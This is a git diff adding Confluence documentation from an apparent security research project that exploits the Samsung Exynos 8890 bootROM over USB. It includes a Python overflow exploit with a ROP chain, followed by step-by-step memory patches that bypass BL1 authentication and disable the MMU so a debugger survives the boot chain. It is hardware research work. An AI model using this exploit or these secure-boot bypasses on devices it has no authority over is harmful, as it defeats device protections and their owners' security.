+          X14 : 0xf | X15 : 0x20c4000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x2000 | X20 : 0x2069000 |
+          X21 : 0x0 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 |
+          X28 : 0x0 | X29 : 0x2020f00 | LR/X30 : 0x20c0000 | SP/X31 : 0x2020ef0]]></ac:plain-text-body>
+</ac:structured-macro>
+<h3>Final debugger</h3>
+<p>We searched for quite some time for a space which was both writeable and executable. After BL31, most space became unreachable, with the MMU not allowing read/write at most spaces. We tried putting the debugger in the GPU cache, and tried some other spaces visible in the dtsi files, but eventually we found a space at <code>0x11200000</code>. This space is executable when the MMU is off. With the MMU on, we can read/write but not execute here.</p><h3>Python part</h3>
+<p>Python code to setup the debugger.</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">python</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[# Setup initial debugger
+self.setup_guppy_debugger()
+self.cd.arch_dbg.state.auto_sync = False
+self.cd.arch_dbg.state.auto_sync_special = False
+logger.debug('State after setting up initial debugger')
+self.cd.arch_dbg.state.print_ctx()
+DEBUGGER_ADDR = 0x2069000 # 0x2069000
+
+# Relocate debugger
+debugger = open("../../dump/reloc_debugger_0x11200000.bin", "rb").read()
+self.relocate_debugger(debugger=debugger, entry=0x11200000, storage=0x11201200, g_data_received=0x11201400)
+DEBUGGER_ADDR = 0x11200000
+
+# Test debugger connection
+self.cd.test_connection()]]></ac:plain-text-body>
+</ac:structured-macro>
+<h2>Stage 1 - Initial exploit</h2>
+<p>Frederic created a payload called ‘Exynos8890dump_bootrom’, which used the usb dwc3 protocol (USB Synopsys DesignWare USB 3.0), to read and dump the bootrom. This payload was slightly modified, to keep the USB connection alive (stage1.bin). Frederic’s C code was implemented in python.</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">python</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[def exploit(self, payload: bytes):
+    '''
+    Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload.
+    '''
+    assert len(payload) <= MAX_PAYLOAD_SIZE, "Shellcode too big"
+
+    current_offset = TARGET_OFFSETS[self.target][0]
+    xfer_buffer_start = TARGET_OFFSETS[self.target][1] # start of USB transfer buffer
+    transferred = ctypes.c_int()
+
+    size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8 + 6 # max_uint32 -  header(8) + data(n) + footer(2)
+    #size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8
+    max_payload_size = 0x100000000 - size_to_overflow
+    ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE) #
+
+    # Assert that payload is 502 bytes
+    payload = payload + ((max_payload_size - len(payload)) * b"\x00")
+    assert len(payload) == max_payload_size, "Invalid payload. Size is wrong"
+
+    # First send payload to trigger the bug
+    bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
+    bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
+    res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
+    assert res == 0, "Error triggering payload"
+    assert transferred.value == len(bug_payload), "Invalid transfered size"
+    current_offset += len(bug_payload) - 8  # Remove header
+
+    cnt = 0
+    while True:
+        if current_offset + CHUNK_SIZE >= xfer_buffer_start and current_offset < xfer_buffer_start:
+            break
+        self.send_empty_transfer()
+        current_offset += CHUNK_SIZE
+        cnt += 1
+        if current_offset > 0x100000000:
+            current_offset = current_offset - 0x100000000 #reset 32 byte integer
+        print(f"{cnt} {hex(current_offset)}")
+
+    remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
+    assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
+    if remaining > BLOCK_SIZE:
+        self.send_empty_transfer()
+        # Send last transfer, TODO who aligns this ROM??
+        current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
+        cnt += 1
+        print(f"{cnt} {hex(current_offset)}")
+
+    # Build ROP chain.
+    rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
+    transferred = ctypes.c_int(0)
+    res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
+    assert res == 0, "Error sending ROP chain"
+    return]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>After this exploitation, we’re able to send custom payloads. The first payload that is sent, sets up the debugger. In order to run the debugger, a small amount of the bootROM was reversed in order to implement send/recv functionality.</p><p>@EljakimHerrewijnen: what send/recv did you reverse? What code from the bootROM did you reverse?</p><h2>Stage 2 - BL1</h2>
+<p>Here, in order, the patches we applied to get BL1 to boot:</p><p><ac:image ac:align="center">
+<ri:attachment ri:filename="484c133648e1cadce9ac668f651d7a7a3be4730c319f3413d0ce2c72099478f6.svg"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">Boot chain</p>
+</p>
+<ul>
+<li>
+<p>Overwrite the USB return address pointer (<em>0x02020f60</em>) to jump back to the debugger. <code>self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))</code></p></li>
+<li>
+<p>Set link register to debugger and jump into the boot USB (<em>0x000064e0</em>) function. <code>self.cd.arch_dbg.state.LR = DEBUGGER_ADDR</code> and then <code>self.cd.restore_stack_and_jump(0x000064e0)</code></p></li>
+<li>
+<p>Now we can send the BL1 binary to the device. <code>self.send_normal_stage(open(&quot;../S7/g930f_latest/g930f_sboot.bin.1.bin&quot;, &quot;rb&quot;).read())</code>. At this point, we retain access to the debugger.</p></li>
+<li>
+<p>To patch the authentication, we set X0 and X1 to 1, then again set the link register to the debugger, and jump into the authentication function at <code>0x00012848</code>. <code>self.cd.arch_dbg.state.X0 = 1</code> and <code>self.cd.arch_dbg.state.X1 = 1</code> and <code>self.cd.arch_dbg.state.LR = lr</code> and then <code>self.cd.restore_stack_and_jump(0x00012848)</code></p></li>
+<li>
+<p>We flush the cache <code>self.usb_write(b&quot;FLSH&quot;)</code> (Frederic did this as well).</p></li>
+<li>
+<p>Now we hijack the USB download function to jump back to the debugger. <code>self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR))</code> and <code>self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins=&quot;br&quot;))</code></p></li>
+<li>
+<p>And finally, we again restore our link register to the debugger, and jump into BL1 <code>self.cd.restore_stack_and_jump(0x000002c0)</code></p></li>
+</ul>
+<p><ac:image ac:align="center">
+<ri:attachment ri:filename="initial_boot_function.png"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">Overview of the initial boot function in the Exynos 8890.</p>
+</p>
+<p>At this point, after loading and executing BL1, the device returns to the debugger. Normally, the device would boot into BL1, and would then wait for the next boot stage to be sent over USB. But because we hijacked the USB return address pointer, the device returns to the debugger.</p><p>Regarding auth_bl1: Initially we thought that 0x0 indicated a verified boot state (as is plausible when reading the decompiled code in Ghidra). But after modifying BL1 in the header and contents, this value did not change.</p><ac:structured-macro ac:name="info">
+<ac:rich-text-body><p>git commit 8cb5f2e1 fully boots, you can use this commit to patch BL1 only.</p></ac:rich-text-body>
+</ac:structured-macro>
+<h2>Stage 3 - BL31</h2>
+<h3>Initial boot through BL31</h3>
+<p>Next up is BL31, which is loaded by BL1. BL31 is written at <code>0x02024000</code> with the entry point at <code>0x02024010</code>, it ends at <code>0x02048000</code>. <code>BL31</code> is the secure monitor. The monitor uses memory that is also being used by the debugger, so we will have to relocate it to keep code exeuction.</p><p><ac:image ac:align="center">
+<ri:attachment ri:filename="bl31_debugger_memory_example.png"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">Example of BL31 using memory from the initial debugger.</p>
+</p>
+<p>BL31 also configures the VBAR_EL3 and MMU so the memory mapping will probably change after this stage (preparation for trustzone?). Here we decided to move the debugger to 0x02048000, as this space is still accessible after BL31, but this space will get overwritten by BL2.</p><p>At this point we switched our approach to booting the device, as we were unable to keep the debugger alive throughout the boot chain. We now boot the device normally, and then try to get our debugger after booting each stage. Because of this, we didn’t need to modify a lot after BL1. Essentially all we did was:</p><ul>
+<li>
+<p>Set the link register to the debugger: <code>self.cd.arch_dbg.state.LR = DEBUGGER_ADDR</code></p></li>
+<li>
+<p>Jump into our hijacked USB function: <code>self.cd.restore_stack_and_jump(hijacked_fun)</code></p></li>
+<li>
+<p>Send BL31: <code>self.send_normal_stage(open(&quot;../S7/g930f_latest/g930f_sboot.bin.2.bin&quot;, &quot;rb&quot;).read())</code></p></li>
+<li>
+<p>Continue a function that BL1 called via the USB: <code>self.cd.restore_stack_and_jump(0x2022948)</code></p></li>
+<li>
+<p>Jump into BL31: <code>self.cd.restore_stack_and_jump(0x02024010)</code></p></li>
+</ul>
+<p>This boot process restores us to the debugger, but after this, we’re unable to access most memory spaces. Notably, we tried getting access to the TTBR0_EL3. But something prohibits us reading there. We weren’t able to find any executable space that was still available, for after BL2. BL2 would overwrite our debugger at this point.</p><h3>Patching BL31</h3>
+<p>While looking for flags which were used for the MMU, we found a function at <code>0x020244e8</code> which we were able to turn off, but which still allowed a full boot into recovery. The MMU however stated to being disabled.</p><ul>
+<li>
+<p>get special registers: <code>self.cd.arch_dbg.fetch_special_regs()</code></p></li>
+<li>
+<p>MMU state: <code>self.cd.arch_dbg.state.R_SCTLR_EL3.mmu</code></p></li>
+</ul>
+<p><ac:image ac:align="center">
+<ri:attachment ri:filename="turn_off_MMU_but_good_boot_0x020244e8.png"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">Function patheable that turns off MMU, but keeps boot intact.</p>
+</p>
+<p>Additionally we found a space at <code>0x11207010</code>, while looking for bit flags in ghidra, which seemed to be a memory read/write space. This space was not executable, unless the MMU was turned off. We used this space to store our debugger, then before booting BL31, we patched the if-statement above to disable the MMU. And booted.</p><ul>
+<li>
+<p>Patch if-statement to not be met: <code>self.cd.memwrite_region(0x020244e8, struct.pack(&apos;&gt;I&apos;, 0x1f0c00f1))</code></p></li>
+<li>
+<p>Jump into BL31: <code>self.cd.restore_stack_and_jump(0x02024010)</code></p></li>
+</ul>
+<h2>Stage 4 - BL2</h2>
+<p>This is our current progress. BL2 has booted, and shows the VBAR’s for EL1.</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">bash</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[MMU is 0x0 (0x1=enabled, 0x0=disabled)
+TTBR0_EL3: 0xbc4650892f1460, TTBR1_EL2: 0xc54d39cb66f0, TTBR0_EL1: 0xa5c20fc0ac581142
+VBAR_EL3: 0x2031800, VBAR_EL2: 0x0, VBAR_EL1: 0x2053800
+TCR_EL3: 0x0, TCR_EL2: 0x80800000, TCR_EL1: 0x0
+SCTLR_EL3: 0xc5183a, SCTLR_EL2: 0x30c5083a, SCTLR_EL1: 0x30c5083a
+MAIR_EL3: 0x44e048e000098aa4, MAIR_EL2: 0x1e42bb572931240b, MAIR_EL1: 0x44e048e000098aa4
+Current EL: 0xc]]></ac:plain-text-body>
+</ac:structured-macro>
+<h2>Stage 5 - BL33</h2>
+<p>The last stage before the kernel boots.</p><p><ac:image ac:align="center">
+<ri:attachment ri:filename="bl31_debugger_memory_example.png"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">Boot chain with EL3 and EL1 areas</p>
+</p>
diff --git a/documentation/_build/confluence/BootROM_8890/04_notes.conf b/documentation/_build/confluence/BootROM_8890/04_notes.conf
new file mode 100644
index 0000000..0f01e17
--- /dev/null
+++ b/documentation/_build/confluence/BootROM_8890/04_notes.conf
@@ -0,0 +1,143 @@
+<p>General notes on interesting/peculiar things found on the S7 USB recovery boot process</p><h2>Emulator</h2>
+<p>What is interesting about the ROM is that it starts by checking MPIDR_EL1 register and doing a conditional branch to 0x20e0000.</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">bash</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[     undefined         w0:1           <RETURN>
+                     Reset                                           XREF[1]:     Entry Point(*)
+00000000 bb 00 38 d5     mrs        x27,mpidr_el1
+00000004 7b 0f 78 92     and        x27,x27,#0xf00
+00000008 7f 03 00 f1     cmp        x27,#0x0
+0000000c 41 00 00 54     b.ne       LAB_00000014
+00000010 fc 7f 83 14     b          LAB_020e0000]]></ac:plain-text-body>
+</ac:structured-macro>
+<h2>BL1 peculiarities</h2>
+<p>At this point, we assumed that the authentication was succesful, and the bootROM would jump back to the debugger after loading, but this was not the case. After running this function, we were able to send a single packet, but never received a response. Indicating that the function we were executing never returned on us.</p><p><ac:image ac:align="center">
+<ri:attachment ri:filename="bl1_auth_references.png"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">BL1 authentication</p>
+</p>
+<p>If authentication at auth_bl1 is succesful, the returns a value from a function at <code>1230c</code>. This function does some things, but eventually jumps to a function at:</p><p><ac:image ac:align="center">
+<ri:attachment ri:filename="bl1_auth_follow-up_1230c.png"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">BL1 authentication</p>
+</p>
+<p>After authentication the bootROM jumps to this function at, we can execute this function with the debugger.</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">python</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[self.cd.memwrite_region(0x02020f60, p32(0x020c0000))
+    BOOT_BL1 = 0x00019310
+    def jump_bl1(lr):
+        self.cd.arch_dbg.state.LR = lr
+        self.cd.restore_stack_and_jump(BOOT_BL1)
+
+    jump_bl1(0x020c0000)
+
+jump_fwbl1()]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>BL1 is loaded at the download buffer and self copies to <code>0x02022000</code> and resumes execution there, with a size of 0x2000 (<code>0x02022000</code> to <code>0x02024000</code>).</p><p>However, this does not result in a jump back to the debugger. But the ROM still allows receival of one data package from the USB host (this is likely the system ‘waiting’ to receive the bootloader).</p><p>By adding the IMEM to ghidra, we can have a look at what is going here. After having modified the LR to jump back to the debugger and jumping into auth_bl1 at <code>0x00012848</code> we jump back to the debugger. Jumping into BL1 at <code>2c0</code> does not return us to the debugger. Here we need to hijack <code>020200dc</code> and <code>02021880</code> we’re able to boot into BL1. We store the address of the hijacked function, to restore it later for a proper boot flow.</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">python</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[auth_bl1(DEBUGGER_ADDR)
+self.usb_write(b"FLSH") # Flush cache
+hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4))
+
+# BL1 patches
+self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
+self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>Authentication of BL1 seems to be done at <code>0x0012848</code>. With return value ‘0’ expected when this function is executed, to execute other functions.</p><p><ac:image ac:align="center">
+<ri:attachment ri:filename="bl1_auth_references.png"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">BL1 authentication.</p>
+</p>
+<h3>purpose</h3>
+<p>bl1 interacts with several pheriperals, from the DTB these are:</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">bash</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[/* FSYS0 */
+    pinctrl_5: pinctrl@10E60000 {
+            compatible = "samsung,exynos8890-pinctrl";
+            reg = <0x0 0x10E60000 0x1000>;
+            interrupts = <0 212 0>;
+    };
+
+    /* FSYS1 */
+    pinctrl_6: pinctrl@15690000 {
+            compatible = "samsung,exynos8890-pinctrl";
+            reg = <0x0 0x15690000 0x1000>;
+            interrupts = <0 202 0>;
+    };
+
+/* PERIC1 */
+    pinctrl_9: pinctrl@14CC0000 {
+            compatible = "samsung,exynos8890-pinctrl";
+            reg = <0x0 0x14CC0000 0x1000>;
+            interrupts = <0 460 0>;
+    };
+
+pmu_system_controller: system-controller@105C0000 {
+            compatible = "samsung,exynos8890-pmu", "syscon";
+            reg = <0x0 0x105C0000 0x10000>;
+    };
+
+rtc@10070000 {
+            compatible = "samsung,s3c6410-rtc";
+            reg = <0x0 0x10070000 0x100>;
+            interrupts = <0 73 0>, <0 74 0>;
+            clocks = <&clock 157>;
+            clock-names = "gate_rtc";
+    };]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>Probably the only thing it does is set some clocks and prepare for BL31.</p><p>The reason for this is the following code in bl1:</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">cpp</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[iVar3 = FUN_02024320();
+if (iVar3 == 1) {
+    (*(code *)(ulong)uRam0000000002020108)(0,1);
+}]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>This code uses a predefined ROM function(I was looking for it) and jumps back to that function when it’s done. This function is at address <code>0x020200e8</code>, looking in our IMEM dump we can see where in the ROM this points to:</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">cpp</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[                     DAT_02020108                                    XREF[2]:     FUN_00001708:000018b4(W),
+                                                                                  FUN_02021970:02021a40(R)
+02020108 90 57 00 00     undefined4 00005790h]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>Replacing this function with our debugger makes us jump back:</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">python</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[# Overwrite jump back
+self.cd.memwrite_region(0x02020108, p32(0x2069000))
+self.cd.memwrite_region(0x020200e8, p32(0x2069000))
+
+def jump_bl1():
+        self.cd.arch_dbg.state.LR = 0x2069000
+        self.cd.restore_stack_and_jump(0x02024010)
+        # self.cd.restore_stack_and_jump(0x02021810)
+
+bl1 = open("../S7/bl1.bin", "rb").read()
+self.cd.memwrite_region(0x02024000, bl1)
+self.usb_write(b"FLSH")
+
+# auth_bl1()
+jump_bl1()
+assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
+self.cd.arch_dbg.state.print_ctx()
+
+root | DEBUG |
+        X0 : 0xc00000 | X1 : 0x2069000 | X2 : 0x0 | X3 : 0x2023114 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 |
+        X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 |
+        X14 : 0xf | X15 : 0x206d000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x20200e8 | X20 : 0x0 |
+        X21 : 0x80000000 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 |
+        X28 : 0x0 | X29 : 0x2020ed8 | LR/X30 : 0x202419c | SP/X31 : 0x2020ec0]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>However this does not fully run bl1, so we will have to dig a bit deeper to see the puropose and when to jump back to the debugger.</p><h2>Week 35 - 2024</h2>
+<p>After booting BL31, the MMU seems to be set up, and we’re unable to do get any data off of spaces we’re not ‘allowed’ to access. Patching the if-statement at 0x020244e8, disables the bit that says that the MMU is setup, but booting into recovery is possible (meaning the MMU is setup). Additionally, the memory at 0x02035600 is still not dumpable. At 0x02048000 is still accessible.</p><p>Weird space found at 0x105c2400. Seems to contain references to usb buffer (about 48-64 bytes). Also space at 0x020307f0, but I lose access to this after booting</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">python</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[self.cd.memdump_region(0x105c2400, 0x40).hex()
+'0f0f00000f0008002100000000000000ffffffffffffffffffffffffffffffff0f0f00000f0008002101000000000000ffffffffffffffffffffffffffffffff']]></ac:plain-text-body>
+</ac:structured-macro>
+<h2>Week 36 - 2024</h2>
+<p>Interesting links: - <a href="https://highaltitudehacks.com/2020/09/05/arm64-reversing-and-exploitation-part-1-arm-instruction-set-heap-overflow.html">Heap overflow</a> - <a href="https://grimler.se/posts/exynos-uart/">UART on S8</a></p><p>By accident found space at 0x11207010. Seems to be a memory read/write space. Not executable however, unless the MMU is turned off.</p><p>We can use this space to store our debugger, and patch the boot process. After loading BL2, we’re now indeed loading VBAR’s for EL1.</p><p>bl31 MMU is 0x0 (0x1=enabled, 0x0=disabled) TTBR0_EL3: 0xbc4640892f1460, TTBR1_EL2: 0x854d39cb76f0, TTBR0_EL1: 0xa5c20f408c581142 VBAR_EL3: 0x18800, VBAR_EL2: 0x0, VBAR_EL1: 0x0 TCR_EL3: 0x0, TCR_EL2: 0x80800000, TCR_EL1: 0x0 SCTLR_EL3: 0xc5183a, SCTLR_EL2: 0x30c5083a, SCTLR_EL1: 0xc5083a MAIR_EL3: 0x44e048e000098aa4, MAIR_EL2: 0x9e42bf572931240b, MAIR_EL1: 0x44e048e000098aa4 Current EL: 0xc</p><p>Jumped to 0x11207010 and back</p><p>bL2 [+] Sent stage Connected device! 0x4e8 0x1234 MMU is 0x0 (0x1=enabled, 0x0=disabled) TTBR0_EL3: 0xbc4640892f1460, TTBR1_EL2: 0x854d39cb76f0, TTBR0_EL1: 0xa5c20f408c581142 VBAR_EL3: 0x2031800, VBAR_EL2: 0x0, VBAR_EL1: 0x2053800 TCR_EL3: 0x0, TCR_EL2: 0x80800000, TCR_EL1: 0x0 SCTLR_EL3: 0xc5183a, SCTLR_EL2: 0x30c5083a, SCTLR_EL1: 0x30c5083a MAIR_EL3: 0x44e048e000098aa4, MAIR_EL2: 0x9e42bf572931240b, MAIR_EL1: 0x44e048e000098aa4 Current EL: 0xc</p><p>The debugger at 0x11200000 can only dump 0x768 at a time (its space related. Before BL31 this is also an issue.).</p><p>There’s an odd space at 0x14kk. With things like deadcafe:</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">python</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[1c0000000000000000000000fecaadde00000000fecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddef]]></ac:plain-text-body>
+</ac:structured-macro>
diff --git a/documentation/_build/confluence/_static/drawio.css b/documentation/_build/confluence/_static/drawio.css
new file mode 100644
index 0000000..5e555eb
--- /dev/null
+++ b/documentation/_build/confluence/_static/drawio.css
@@ -0,0 +1,8 @@
+img.drawio {
+    border: 0;
+    max-width: 100%;
+}
+
+object.drawio {
+    max-width: 100%;
+}
\ No newline at end of file
diff --git a/documentation/_build/confluence/index.conf b/documentation/_build/confluence/index.conf
new file mode 100644
index 0000000..ec08608
--- /dev/null
+++ b/documentation/_build/confluence/index.conf
@@ -0,0 +1,111 @@
+<p>Documentation on Samsung devices, currently mainly the Samsung S7. Here we’re exploiting the Exynos 8890, which is present on both the Samsung S7 and the MIB3 High (VAG).</p><p style="clear: both;">BootROMs:</p>
+<ul>
+<li>
+<ac:link>
+<ri:page ri:content-title="Start/Home" />
+<ac:link-body>Start/Home</ac:link-body>
+</ac:link><ul>
+<li>
+<ac:link ac:anchor="Protections">
+<ri:page ri:content-title="Start/Home" />
+<ac:link-body>Protections</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="SamsungFirmware">
+<ri:page ri:content-title="Start/Home" />
+<ac:link-body>Samsung Firmware</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="MemoryLayout">
+<ri:page ri:content-title="Start/Home" />
+<ac:link-body>Memory Layout</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="Downloadprotocol">
+<ri:page ri:content-title="Start/Home" />
+<ac:link-body>Download protocol</ac:link-body>
+</ac:link></li>
+</ul>
+</li>
+<li>
+<ac:link>
+<ri:page ri:content-title="Frederic’s Exploit" />
+<ac:link-body>Frederic’s Exploit</ac:link-body>
+</ac:link><ul>
+<li>
+<ac:link ac:anchor="USBStackinBootROM">
+<ri:page ri:content-title="Frederic’s Exploit" />
+<ac:link-body>USB Stack in BootROM</ac:link-body>
+</ac:link></li>
+</ul>
+</li>
+<li>
+<ac:link>
+<ri:page ri:content-title="Exploit boot chain" />
+<ac:link-body>Exploit boot chain</ac:link-body>
+</ac:link><ul>
+<li>
+<ac:link ac:anchor="Generaloverview">
+<ri:page ri:content-title="Exploit boot chain" />
+<ac:link-body>General overview</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="Debuggers">
+<ri:page ri:content-title="Exploit boot chain" />
+<ac:link-body>Debuggers</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="Stage1-Initialexploit">
+<ri:page ri:content-title="Exploit boot chain" />
+<ac:link-body>Stage 1 - Initial exploit</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="Stage2-BL1">
+<ri:page ri:content-title="Exploit boot chain" />
+<ac:link-body>Stage 2 - BL1</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="Stage3-BL31">
+<ri:page ri:content-title="Exploit boot chain" />
+<ac:link-body>Stage 3 - BL31</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="Stage4-BL2">
+<ri:page ri:content-title="Exploit boot chain" />
+<ac:link-body>Stage 4 - BL2</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="Stage5-BL33">
+<ri:page ri:content-title="Exploit boot chain" />
+<ac:link-body>Stage 5 - BL33</ac:link-body>
+</ac:link></li>
+</ul>
+</li>
+<li>
+<ac:link>
+<ri:page ri:content-title="Notes" />
+<ac:link-body>Notes</ac:link-body>
+</ac:link><ul>
+<li>
+<ac:link ac:anchor="Emulator">
+<ri:page ri:content-title="Notes" />
+<ac:link-body>Emulator</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="BL1peculiarities">
+<ri:page ri:content-title="Notes" />
+<ac:link-body>BL1 peculiarities</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="Week35-2024">
+<ri:page ri:content-title="Notes" />
+<ac:link-body>Week 35 - 2024</ac:link-body>
+</ac:link></li>
+<li>
+<ac:link ac:anchor="Week36-2024">
+<ri:page ri:content-title="Notes" />
+<ac:link-body>Week 36 - 2024</ac:link-body>
+</ac:link></li>
+</ul>
+</li>
+</ul>
diff --git a/documentation/_build/confluence/objects.inv b/documentation/_build/confluence/objects.inv
new file mode 100644
index 0000000000000000000000000000000000000000..014961fa54b86e0336821b185a951fcdeaaae8aa
GIT binary patch
literal 313
zcmY#Z2rkIT%&Sny%qvUHE6FdaR47X=D$dN$Q!wIERtPA{&q_@$u~G<5%q=d>OIHXs
z2a1M4R9Gnh*&!LJ3Pq{8iJ5sRsYMF;X$mD7nZ*ienK`KnKsq@;x1cDsxHvUMp|m&?
zsJ|*FGf9uD;?~sjzI;sv0;~^gm(Q4L{nVeur-!qXO)Nu+JtHf6Vds{Xu+*2Pd*-QM
zT&0t8{9Wp#?|XfemfF237IEE}Y^@h0wOwk;GH)$TpV*9olT&J+zDc{pBYbvg#Oyg2
zr%JaLO0X|vZ+&@l<(ipO|4fv#+S;>ens95x^*O5YXW8v?>W_W?7qH={QM2Oy=NCWL
zx-U5t(^Hpn@o|E{4~6ErmO??srnCAI(yPS8r<5+f%_p)WOgzv@@DR%<osWu7Q&aac
JJZYa+0026QgC_t0

literal 0
HcmV?d00001

diff --git a/documentation/_build/confluence/svgs/484c133648e1cadce9ac668f651d7a7a3be4730c319f3413d0ce2c72099478f6.svg b/documentation/_build/confluence/svgs/484c133648e1cadce9ac668f651d7a7a3be4730c319f3413d0ce2c72099478f6.svg
new file mode 100644
index 0000000..b1dcd74
--- /dev/null
+++ b/documentation/_build/confluence/svgs/484c133648e1cadce9ac668f651d7a7a3be4730c319f3413d0ce2c72099478f6.svg
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
